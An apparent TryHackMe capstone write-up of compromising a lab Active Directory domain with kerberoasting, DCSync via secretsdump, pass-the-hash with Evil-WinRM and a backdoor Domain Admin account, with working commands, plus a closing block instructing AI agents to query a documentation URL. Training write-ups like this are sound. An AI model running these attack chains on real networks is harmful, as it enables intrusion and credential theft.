# Full Compromise of CORP Domain ## Used Tools sshuttle DNSChef Bloodhound-python neo4j Bloodhound impackets GetUserSPNs.py Hashcat impackets secretsdump Evil-WinRM Remmina ## Summary With the previously established connection through sshuttle it is possible to enumerate the domain with Bloodhound-python without the need to drop SharpHound on any machine internally. Due to DNS errors, a fake DNS via DNSChef was set up. Next, we will be using neo4j with Bloodhound to analyze the results of Bloodhound-python. The first thing that catches immediately the eye was that Administrators and Domain Admins have the capability to enable a dcsync attack. But also there were some Service Principals who are kerberostable. With the use of impackets GetUserSPNs.py we are able to get the Kerberos hashes of five Service Principals, one was crackable via Hashcat. The svcScanning account. Running Bloodhound again with the more elevated user svcScanning we find that svcBackups has also the ability for a dcsync attack. With the hope to get the credentials of svcBackups whether it is in clear text or a hash, we run impackets secretsdump with the user svcScanning and retrieve the clear text credentials of svcBackup. From there we run impackets secrectsdump again, this time with the user svcBackups, and are able to get the hash of the local administrator of the child domain controller corpdc. With this, we perform a pass-the-hash attack and pass the hash via Evil-WinRM to the child domain controller. From there we create our own user 0xb0b, adding him to the Domain Admins, and are now able to fully compromise the CORP Domain and are able to RDP into the child domain controller with the newly created user. ## Investigation First, we try to enumerate the domain with Bloodhound-python but receive a DNS error. The same issue occurred, passing the connection through ssh dynamic port forwarding and using ProxyChains. In this case `--dns-tcp` has to be used. To evade this problem, a fake DNS was set up. {% hint style="info" %} Using Bloodhound-python with ProxyChains and DNSChef {% endhint %}

Running the following to establish a fake DNS.

This time the command looks a bit different. The nameserver is now our localhost everything else remains the same and we are able to enumerate the domain. ``` ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone/bloodhound/laura.wood] └─$ bloodhound-python -d corp.thereserve.loc -u laura.wood -p 'Password1@' -dc corpdc.corp.thereserve.loc -c all -ns 127.0.0.1 let ```

let’s start neo4j and run Bloodhound to find some interesting stuff on the domain.

Just drop the files into Bloodhound.

The first thing that catches the eye is that we are able to find groups with the ability to perform dcsync attacks which might interesting for the full compromise of the parent domain. In a `dcsync attack`, credentials are harvested by simulating a domain controller asking to replicate information of another domain controller. This can be accomplished remotely via impackets `secretdump.py` or locally running mimikatz on a victim machine with `lsadump::dcsync`. {% hint style="info" %} Persistence through Credentials {% endhint %}

Administrators And Domain Admins are able to perform a `dcsync` attack.

Running `GetUsersSPN`s to get any information about the ServicePrincipalNames in the hope to get a more elevated user. ``` ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone] └─$ /usr/share/doc/python3-impacket/examples/GetUserSPNs.py corp.thereserve.loc/laura.wood:"Password1@" -dc-ip 10.200.103.102 -request ``` Here we have the hashes of`svcBackups`, `svcEDR`, `svcMonitor`, `svcScanning` and `svcOctober`.

Trying to crack any of the hashes gives us the credentials of `svcScanning:Password1` We chose to use mode 13100 for cracking Kerberos 5, etype 23, TGS-REP hashes.

Next, we repeat the bloodhound enumeration, this time with `svcScanning`. ``` ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone/bloodhound/svcScanning] └─$ bloodhound-python -d corp.thereserve.loc -u svcScanning -p 'Password1!' -dc corpdc.corp.thereserve.loc -c all -ns 127.0.0.1 ```

After deleting the database and resetting the database stats, we drop the results of `svcScanning` in.

Checking out the `shortest path to high value targets` reveals to us the user `svcBackups` has also the capability to perform a `dcsync` attack.

Bloodhound: Shortest Path to High Value Targets

Bloodhound: Node Info svcBackups - Reachable High Value Targets

Running `impackets-secretsdumps` with the user `svcScanning` in the hope to get any credentials of `svcBackups` or another high value target. `impacket-secretsdump corp.thereserve.loc/svcScanning:'Password1!'@10.200.103.31` ``` ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone] └─$ impacket-secretsdump corp.thereserve.loc/svcScanning:'Password1!'@10.200.103.31 ```

`svcBackups@corp.thereserve.loc:q9nzssaFtGHdqUV3Qv6G` And we are getting `svcBackups` credentials with `dcsync` capabilities With this user we run again `impacket-secretsdump` and are able to retrieve the local Administrator hash. ``` ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone] └─$ impacket-secretsdump corp.thereserve.loc/svcBackups:q9nzssaFtGHdqUV3Qv6G@10.200.103.102 ```

Using Evil-WinRM and the pass the hash attack we are able to directly connect to the child domain controller corpdc. ``` ┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone] └─$ evil-winrm -u Administrator -H d3d4edcc015856e386074795aea86b3e -i 10.200.103.102 ``` Running the following commands to add our own user and adding him to the Domain Admins. `New-ADUser 0xb0b` `Add-ADGroupMember -Identity 'Domain Admins' -Members 0xb0b` `Set-ADAccountPassword -Identity 0xb0b -NewPassword (ConvertTo-SecureString -AsPlainText "WhoKnows1337Me?" -Force)` `Enable-ADAccount -Identity '0xb0b'`

Next we use Remmina to connect to the domain controller as 0xb0b.

Connected to the domain controller as our user we are able to start the command line as administrator from there we are able to reach every machine in the corp domain and placing our proof of compromises on the given locations to retrieve the flags.

## Flag-4: Administrative access to Corporate Division Tier 2 Infrastructure ``` echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\wrk1.corp.thereserve.loc\c$\Users\Administrator\0xb0b.txt ``` ## Flag-5: Foothold on Corporate Division Tier 1 Infrastructure ``` echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\server1.corp.thereserve.loc\c$\Windows\Temp\0xb0b.txt ``` ## Flag-6: Administrative access to Corporate Division Tier 1 Infrastructure ``` echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\server1.corp.thereserve.loc\c$\Users\Administrator\0xb0b.txt ``` ## Flag-7: Foothold on Corporate Division Tier 0 Infrastructure ``` echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\cropdc.corp.thereserve.loc\c$\Windows\Temp\0xb0b.txt ``` ## Flag-8: Administrative access to Corporate Division Tier 0 Infrastructure ``` echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\cropdc.corp.thereserve.loc\c$\Users\Administrator\0xb0b.txt ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xb0b.gitbook.io/writeups/tryhackme/red-team-capstone-challenge/full-compromise-of-corp-domain.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.